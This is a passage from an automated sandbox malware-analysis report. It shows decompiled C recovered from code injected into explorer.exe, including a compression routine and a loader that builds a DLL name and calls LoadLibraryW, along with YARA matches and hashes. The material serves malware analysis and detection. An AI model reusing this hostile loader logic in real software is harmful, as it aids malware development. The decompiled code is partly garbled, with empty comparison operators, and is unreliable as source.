                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                            						_t74 = _t272 + 0x6c; // 0xf8e4158b
                                                                                                            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                            						_t225 = _a4;
                                                                                                            						_t273 = _t273 + 0xc;
                                                                                                            						_t76 = _t272 + 0x6c;
                                                                                                            						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                            						__eflags =  *_t76;
                                                                                                            						_t78 = _t272 + 0x6c; // 0xf8e4158b
                                                                                                            						_t184 =  *_t78;
                                                                                                            						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            						_t239 =  *_t79;
                                                                                                            					} else {
                                                                                                            						 *(_t272 + 0x16b0) = 2;
                                                                                                            						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                            						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                            						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            						_t184 =  *_t62;
                                                                                                            						_t273 = _t273 + 0xc;
                                                                                                            						_t225 = _a4;
                                                                                                            						_t239 = _t184;
                                                                                                            						 *(_t272 + 0x6c) = _t184;
                                                                                                            					}
                                                                                                            					_t254 = _t184;
                                                                                                            					 *(_t272 + 0x5c) = _t184;
                                                                                                            					_t81 = _t272 + 0x16b4; // 0x5750438
                                                                                                            					_t185 =  *_t81;
                                                                                                            					_t240 = _t239 - _t185;
                                                                                                            					_t241 =  <=  ? _t225 : _t240;
                                                                                                            					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                            				}
                                                                                                            				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                            					 *(_t272 + 0x16c0) = _t254;
                                                                                                            				}
                                                                                                            				if(_t269 == 0) {
                                                                                                            					_t218 = _a8;
                                                                                                            					__eflags = _t218;
                                                                                                            					if(_t218 == 0) {
                                                                                                            						L34:
                                                                                                            						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                            						_t219 =  *_t272;
                                                                                                            						_t145 =  *_t89 - _t254 - 1;
                                                                                                            						_a4 =  *_t272;
                                                                                                            						_t234 = _t254;
                                                                                                            						_v16 = _t145;
                                                                                                            						_v8 = _t254;
                                                                                                            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                            							_v8 = _t254;
                                                                                                            							_t95 = _t272 + 0x5c; // 0x35e85000
                                                                                                            							_a4 = _t219;
                                                                                                            							_t234 = _t254;
                                                                                                            							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            							__eflags =  *_t95 -  *_t97;
                                                                                                            							if( *_t95 >=  *_t97) {
                                                                                                            								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            								_t167 =  *_t98;
                                                                                                            								_t259 = _t254 - _t167;
                                                                                                            								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                            								 *(_t272 + 0x6c) = _t259;
                                                                                                            								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                            								_t103 = _t272 + 0x16b0; // 0x830a74c0
                                                                                                            								_t170 =  *_t103;
                                                                                                            								_t273 = _t273 + 0xc;
                                                                                                            								__eflags = _t170 - 2;
                                                                                                            								if(_t170 < 2) {
                                                                                                            									_t172 = _t170 + 1;
                                                                                                            									__eflags = _t172;
                                                                                                            									 *(_t272 + 0x16b0) = _t172;
                                                                                                            								}
                                                                                                            								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            								_t145 = _v16 +  *_t106;
                                                                                                            								__eflags = _t145;
                                                                                                            								_a4 =  *_t272;
                                                                                                            								_t108 = _t272 + 0x6c; // 0xf8e4158b
                                                                                                            								_t234 =  *_t108;
                                                                                                            								_v8 = _t234;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t255 = _a4;
                                                                                                            						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                            						__eflags = _t145 - _t220;
                                                                                                            						_t221 =  <=  ? _t145 : _t220;
                                                                                                            						_t146 = _t221;
                                                                                                            						_a4 = _t221;
                                                                                                            						_t222 = _a8;
                                                                                                            						__eflags = _t146;
                                                                                                            						if(_t146 != 0) {
                                                                                                            							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                            							E032F6040(_t255,  *_t114 + _v8, _t146);
                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                            							_t117 = _t272 + 0x6c;
                                                                                                            							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                            							__eflags =  *_t117;
                                                                                                            							_t119 = _t272 + 0x6c; // 0xf8e4158b
                                                                                                            							_t234 =  *_t119;
                                                                                                            						}
                                                                                                            						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                            						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                            							 *(_t272 + 0x16c0) = _t234;
                                                                                                            						}
                                                                                                            						_t122 = _t272 + 0x16bc; // 0x5deed9c3
                                                                                                            						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                            						__eflags = _t257 - 0xffff;
                                                                                                            						_t258 =  >  ? 0xffff : _t257;
                                                                                                            						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            						_t151 =  *_t124;
                                                                                                            						_t125 = _t272 + 0x5c; // 0x35e85000
                                                                                                            						_t235 = _t234 -  *_t125;
                                                                                                            						__eflags = _t258 - _t151;
                                                                                                            						_t152 =  <=  ? _t258 : _t151;
                                                                                                            						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                            						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                            							L49:
                                                                                                            							__eflags = _t235 - _t258;
                                                                                                            							_t154 =  >  ? _t258 : _t235;
                                                                                                            							_a4 =  >  ? _t258 : _t235;
                                                                                                            							__eflags = _t222 - 4;
                                                                                                            							if(_t222 != 4) {
                                                                                                            								L53:
                                                                                                            								_t269 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            							} else {
                                                                                                            								_t161 =  *_t272;
                                                                                                            								__eflags =  *(_t161 + 4);
                                                                                                            								_t154 = _a4;
                                                                                                            								if( *(_t161 + 4) != 0) {
                                                                                                            									goto L53;
                                                                                                            								} else {
                                                                                                            									__eflags = _t154 - _t235;
                                                                                                            									if(_t154 != _t235) {
                                                                                                            										goto L53;
                                                                                                            									} else {
                                                                                                            										_t269 = _t222 - 3;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                            							_t132 = _t272 + 0x5c; // 0x35e85000
                                                                                                            							E032F71A0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                            							_t134 = _t272 + 0x5c;
                                                                                                            							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                            							__eflags =  *_t134;
                                                                                                            							E032F5F00( *_t134,  *_t272);
                                                                                                            						} else {
                                                                                                            							__eflags = _t235;
                                                                                                            							if(_t235 != 0) {
                                                                                                            								L46:
                                                                                                            								__eflags = _t222;
                                                                                                            								if(_t222 != 0) {
                                                                                                            									_t162 =  *_t272;
                                                                                                            									__eflags =  *(_t162 + 4);
                                                                                                            									if( *(_t162 + 4) == 0) {
                                                                                                            										__eflags = _t235 - _t258;
                                                                                                            										if(_t235 <= _t258) {
                                                                                                            											goto L49;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								__eflags = _t222 - 4;
                                                                                                            								if(_t222 == 4) {
                                                                                                            									goto L46;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						asm("sbb edi, edi");
                                                                                                            						_t271 =  ~_t269 & 0x00000002;
                                                                                                            						__eflags = _t271;
                                                                                                            						return _t271;
                                                                                                            					} else {
                                                                                                            						__eflags = _t218 - 4;
                                                                                                            						if(_t218 == 4) {
                                                                                                            							goto L34;
                                                                                                            						} else {
                                                                                                            							_t173 =  *_t272;
                                                                                                            							__eflags =  *(_t173 + 4);
                                                                                                            							if( *(_t173 + 4) != 0) {
                                                                                                            								goto L34;
                                                                                                            							} else {
                                                                                                            								_t88 = _t272 + 0x5c; // 0x35e85000
                                                                                                            								__eflags = _t254 -  *_t88;
                                                                                                            								if(_t254 !=  *_t88) {
                                                                                                            									goto L34;
                                                                                                            								} else {
                                                                                                            									return 1;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					return 3;
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x032f438f
                                                                                                            0x032f42ea
                                                                                                            0x032f42ea
                                                                                                            0x032f42ea
                                                                                                            0x032f42ef
                                                                                                            0x032f4319
                                                                                                            0x032f431c
                                                                                                            0x032f431c
                                                                                                            0x032f4321
                                                                                                            0x032f4323
                                                                                                            0x032f4325
                                                                                                            0x032f4328
                                                                                                            0x032f432b
                                                                                                            0x032f4333
                                                                                                            0x032f4338
                                                                                                            0x032f4338
                                                                                                            0x032f433e
                                                                                                            0x032f4341
                                                                                                            0x032f4344
                                                                                                            0x032f4347
                                                                                                            0x032f4349
                                                                                                            0x032f4349
                                                                                                            0x032f434a
                                                                                                            0x032f434a
                                                                                                            0x032f4347
                                                                                                            0x032f4358
                                                                                                            0x032f435b
                                                                                                            0x032f435f
                                                                                                            0x032f4364
                                                                                                            0x032f4367
                                                                                                            0x032f436a
                                                                                                            0x032f436a
                                                                                                            0x032f436a
                                                                                                            0x032f436d
                                                                                                            0x032f436d
                                                                                                            0x032f4370
                                                                                                            0x032f4370
                                                                                                            0x032f42f1
                                                                                                            0x032f42f1
                                                                                                            0x032f4301
                                                                                                            0x032f4304
                                                                                                            0x032f4309
                                                                                                            0x032f4309
                                                                                                            0x032f430c
                                                                                                            0x032f430f
                                                                                                            0x032f4312
                                                                                                            0x032f4314
                                                                                                            0x032f4314
                                                                                                            0x032f4373
                                                                                                            0x032f4375
                                                                                                            0x032f4378
                                                                                                            0x032f4378
                                                                                                            0x032f437e
                                                                                                            0x032f4382
                                                                                                            0x032f4385
                                                                                                            0x032f4387
                                                                                                            0x032f4387
                                                                                                            0x032f4398
                                                                                                            0x032f439a
                                                                                                            0x032f439a
                                                                                                            0x032f43a2
                                                                                                            0x032f43b0
                                                                                                            0x032f43b3
                                                                                                            0x032f43b5
                                                                                                            0x032f43d5
                                                                                                            0x032f43d5
                                                                                                            0x032f43d8
                                                                                                            0x032f43de
                                                                                                            0x032f43df
                                                                                                            0x032f43e2
                                                                                                            0x032f43e4
                                                                                                            0x032f43e7
                                                                                                            0x032f43ea
                                                                                                            0x032f43ed
                                                                                                            0x032f43f1
                                                                                                            0x032f43f4
                                                                                                            0x032f43f7
                                                                                                            0x032f43fa
                                                                                                            0x032f43fc
                                                                                                            0x032f43fc
                                                                                                            0x032f43ff
                                                                                                            0x032f4401
                                                                                                            0x032f4401
                                                                                                            0x032f4404
                                                                                                            0x032f4406
                                                                                                            0x032f4409
                                                                                                            0x032f4411
                                                                                                            0x032f4414
                                                                                                            0x032f4419
                                                                                                            0x032f4419
                                                                                                            0x032f441f
                                                                                                            0x032f4422
                                                                                                            0x032f4425
                                                                                                            0x032f4427
                                                                                                            0x032f4427
                                                                                                            0x032f4428
                                                                                                            0x032f4428
                                                                                                            0x032f4433
                                                                                                            0x032f4433
                                                                                                            0x032f4433
                                                                                                            0x032f4436
                                                                                                            0x032f4439
                                                                                                            0x032f4439
                                                                                                            0x032f443c
                                                                                                            0x032f443c
                                                                                                            0x032f43ff
                                                                                                            0x032f443f
                                                                                                            0x032f4442
                                                                                                            0x032f4445
                                                                                                            0x032f4447
                                                                                                            0x032f444a
                                                                                                            0x032f444c
                                                                                                            0x032f444f
                                                                                                            0x032f4452
                                                                                                            0x032f4454
                                                                                                            0x032f4457
                                                                                                            0x032f445f
                                                                                                            0x032f4467
                                                                                                            0x032f446a
                                                                                                            0x032f446a
                                                                                                            0x032f446a
                                                                                                            0x032f446d
                                                                                                            0x032f446d
                                                                                                            0x032f446d
                                                                                                            0x032f4470
                                                                                                            0x032f4476
                                                                                                            0x032f4478
                                                                                                            0x032f4478
                                                                                                            0x032f447e
                                                                                                            0x032f4484
                                                                                                            0x032f448d
                                                                                                            0x032f4494
                                                                                                            0x032f4496
                                                                                                            0x032f4499
                                                                                                            0x032f4499
                                                                                                            0x032f449c
                                                                                                            0x032f449c
                                                                                                            0x032f449f
                                                                                                            0x032f44a1
                                                                                                            0x032f44a4
                                                                                                            0x032f44a6
                                                                                                            0x032f44c1
                                                                                                            0x032f44c1
                                                                                                            0x032f44c5
                                                                                                            0x032f44c8
                                                                                                            0x032f44cb
                                                                                                            0x032f44ce
                                                                                                            0x032f44e4
                                                                                                            0x032f44e4
                                                                                                            0x032f44e4
                                                                                                            0x032f44d0
                                                                                                            0x032f44d0
                                                                                                            0x032f44d2
                                                                                                            0x032f44d6
                                                                                                            0x032f44d9
                                                                                                            0x00000000
                                                                                                            0x032f44db
                                                                                                            0x032f44db
                                                                                                            0x032f44dd
                                                                                                            0x00000000
                                                                                                            0x032f44df
                                                                                                            0x032f44df
                                                                                                            0x032f44df
                                                                                                            0x032f44dd
                                                                                                            0x032f44d9
                                                                                                            0x032f44e8
                                                                                                            0x032f44eb
                                                                                                            0x032f44f0
                                                                                                            0x032f44fa
                                                                                                            0x032f44fa
                                                                                                            0x032f44fa
                                                                                                            0x032f44fd
                                                                                                            0x032f44a8
                                                                                                            0x032f44a8
                                                                                                            0x032f44aa
                                                                                                            0x032f44b1
                                                                                                            0x032f44b1
                                                                                                            0x032f44b3
                                                                                                            0x032f44b5
                                                                                                            0x032f44b7
                                                                                                            0x032f44bb
                                                                                                            0x032f44bd
                                                                                                            0x032f44bf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f44bf
                                                                                                            0x032f44bb
                                                                                                            0x032f44ac
                                                                                                            0x032f44ac
                                                                                                            0x032f44af
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f44af
                                                                                                            0x032f44aa
                                                                                                            0x032f4507
                                                                                                            0x032f4509
                                                                                                            0x032f4509
                                                                                                            0x032f4514
                                                                                                            0x032f43b7
                                                                                                            0x032f43b7
                                                                                                            0x032f43ba
                                                                                                            0x00000000
                                                                                                            0x032f43bc
                                                                                                            0x032f43bc
                                                                                                            0x032f43be
                                                                                                            0x032f43c2
                                                                                                            0x00000000
                                                                                                            0x032f43c4
                                                                                                            0x032f43c4
                                                                                                            0x032f43c4
                                                                                                            0x032f43c7
                                                                                                            0x00000000
                                                                                                            0x032f43cb
                                                                                                            0x032f43d4
                                                                                                            0x032f43d4
                                                                                                            0x032f43c7
                                                                                                            0x032f43c2
                                                                                                            0x032f43ba
                                                                                                            0x032f43a6
                                                                                                            0x032f43af
                                                                                                            0x032f43af

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3510742995-0
                                                                                                            • Opcode ID: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
                                                                                                            • Instruction ID: 77bb82fd6ba54fe992d239d301a3237bd622d69a9ed18c436889e843e3d8fa30
                                                                                                            • Opcode Fuzzy Hash: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
                                                                                                            • Instruction Fuzzy Hash: 69D115756106059FDB24DF6EC8C096AF7E5FF88304B68897DE98AC7700D7B1E9848B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 89%
                                                                                                            			E032ED31D(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                            				char _v8;
                                                                                                            				char _v12;
                                                                                                            				char _v140;
                                                                                                            				signed char _t14;
                                                                                                            				char _t15;
                                                                                                            				intOrPtr _t20;
                                                                                                            				void* _t25;
                                                                                                            				intOrPtr _t26;
                                                                                                            				intOrPtr _t32;
                                                                                                            				WCHAR* _t34;
                                                                                                            				intOrPtr _t35;
                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                            				intOrPtr _t38;
                                                                                                            				intOrPtr _t46;
                                                                                                            				void* _t47;
                                                                                                            				intOrPtr _t50;
                                                                                                            				void* _t60;
                                                                                                            				void* _t61;
                                                                                                            				char _t62;
                                                                                                            				void* _t65;
                                                                                                            				intOrPtr _t66;
                                                                                                            				char _t68;
                                                                                                            
                                                                                                            				_t65 = __esi;
                                                                                                            				_t61 = __edi;
                                                                                                            				_t47 = __ebx;
                                                                                                            				_t50 =  *0x32ff8e4; // 0x3310000
                                                                                                            				_t14 =  *(_t50 + 0x1898);
                                                                                                            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                            					_t15 = E032E9F8F(_t50, 0x2e4);
                                                                                                            					_t66 =  *0x32ff8e4; // 0x3310000
                                                                                                            					_t62 = _t15;
                                                                                                            					_t67 = _t66 + 0xb0;
                                                                                                            					_v8 = _t62;
                                                                                                            					E032E9FEE( &_v140, 0x40, L"%08x", E032EE3C8(_t66 + 0xb0, E032EA5DA(_t66 + 0xb0), 0));
                                                                                                            					_t20 =  *0x32ff8e4; // 0x3310000
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					_t25 = E032E9F8F(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000034) + 0xaaa);
                                                                                                            					_t26 =  *0x32ff8e4; // 0x3310000
                                                                                                            					_t68 = E032E9BF7(_t26 + 0x1020);
                                                                                                            					_v12 = _t68;
                                                                                                            					E032E8D41( &_v8);
                                                                                                            					_t32 =  *0x32ff8e4; // 0x3310000
                                                                                                            					_t34 = E032E9BF7(_t32 + 0x122a);
                                                                                                            					 *0x32ff9e4 = _t34;
                                                                                                            					_t35 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x32fc9d8,  &_v140, ".", L"dll", 0, 0x32fc9d8, _t25, 0x32fc9d8, _t62, 0, _t61, _t65, _t47);
                                                                                                            					_t37 = LoadLibraryW( *0x32ff9e4);
                                                                                                            					 *0x32ff9dc = _t37;
                                                                                                            					if(_t37 == 0) {
                                                                                                            						_t38 = 0;
                                                                                                            					} else {
                                                                                                            						_push(_t37);
                                                                                                            						_t60 = 0x28;
                                                                                                            						_t38 = E032EF10E(0x32fcbc4, _t60);
                                                                                                            					}
                                                                                                            					 *0x32ff9e0 = _t38;
                                                                                                            					E032E8D86( &_v12, 0xfffffffe);
                                                                                                            					E032E8F0A( &_v140, 0, 0x80);
                                                                                                            					if( *0x32ff9e0 != 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						E032E8D86(0x32ff9e4, 0xfffffffe);
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L8:
                                                                                                            					if( *0x32ff9e0 == 0) {
                                                                                                            						_t46 =  *0x32ff918; // 0x52ef808
                                                                                                            						 *0x32ff9e0 = _t46;
                                                                                                            					}
                                                                                                            					L10:
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            			}


























                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: %08x$dll
                                                                                                            • API String ID: 1029625771-2963171978
                                                                                                            • Opcode ID: 7d60d52cc85edefa8ae4894cb9c6658e0220140e0af219134a8ef8843d286d89
                                                                                                            • Instruction ID: a7ee05da4e32a61889137f8afeb7e65f185015e8b7579a40f86361461ac2931b
                                                                                                            • Opcode Fuzzy Hash: 7d60d52cc85edefa8ae4894cb9c6658e0220140e0af219134a8ef8843d286d89
                                                                                                            • Instruction Fuzzy Hash: C731C676A602057FD710EBA8FE8AFAA73ECEB45664F548176F104D7280EB7499C08760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 47%
                                                                                                            			E032F36F2(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                            				char _v5;
                                                                                                            				long long _v12;
                                                                                                            				short _v20;
                                                                                                            				signed int _t15;
                                                                                                            				void* _t16;
                                                                                                            				signed int _t22;
                                                                                                            				char _t25;
                                                                                                            				void* _t26;
                                                                                                            				signed int _t28;
                                                                                                            				intOrPtr _t29;
                                                                                                            				void* _t31;
                                                                                                            				char** _t32;
                                                                                                            				long long _t40;
                                                                                                            				long long _t41;
                                                                                                            
                                                                                                            				_t40 = __fp0;
                                                                                                            				_t15 = E032F360B(_a4);
                                                                                                            				 *_t32 = "msxml32.dll";
                                                                                                            				_t28 = _t15 & 0x0fffffff;
                                                                                                            				_t16 = E032EA5DA();
                                                                                                            				_t26 = 0xf;
                                                                                                            				_t25 = 0;
                                                                                                            				_v5 = 0;
                                                                                                            				if(_t16 > _t26) {
                                                                                                            					L2:
                                                                                                            					_t3 = _t25 + 0x41; // 0x41
                                                                                                            					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                            					_t25 = _t25 + 1;
                                                                                                            				} else {
                                                                                                            					_t26 = _t16;
                                                                                                            					if(_t26 != 0) {
                                                                                                            						do {
                                                                                                            							goto L2;
                                                                                                            						} while (_t25 < _t26);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				lstrlenW( &_v20);
                                                                                                            				_t29 = _a8;
                                                                                                            				_t22 = _a12 - _t29 + 1;
                                                                                                            				_a12 = _t22;
                                                                                                            				asm("fild dword [ebp+0x10]");
                                                                                                            				if(_t22 < 0) {
                                                                                                            					_t40 = _t40 +  *0x32fcf90;
                                                                                                            				}
                                                                                                            				_a12 = _t28;
                                                                                                            				_v12 = _t40;
                                                                                                            				_t41 = _v12;
                                                                                                            				asm("fild dword [ebp+0x10]");
                                                                                                            				if(_t28 < 0) {
                                                                                                            					_t41 = _t41 +  *0x32fcf90;
                                                                                                            				}
                                                                                                            				_v12 = _t41;
                                                                                                            				asm("fmulp st1, st0");
                                                                                                            				L032F89B5();
                                                                                                            				return _t29 - _t22;
                                                                                                            			}


















                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 032F3739
                                                                                                            • _ftol2_sse.MSVCRT ref: 032F377C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _ftol2_sselstrlen
                                                                                                            • String ID: msxml32.dll
                                                                                                            • API String ID: 1292649733-2051705522
                                                                                                            • Opcode ID: 5995a8d9eeceb1bbde181764f347b04b72c89d25c98985c1e66c886a6668b7e0
                                                                                                            • Instruction ID: d66e6bd230a1ec43c4ad73f9ef7cda45d6a3675d90390c12531174d7728a06c3
                                                                                                            • Opcode Fuzzy Hash: 5995a8d9eeceb1bbde181764f347b04b72c89d25c98985c1e66c886a6668b7e0
                                                                                                            • Instruction Fuzzy Hash: 2E112576A10349AFCF04EF68E8041DEFFB4FF44320F2682B9DA5482249EB30D1A08B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%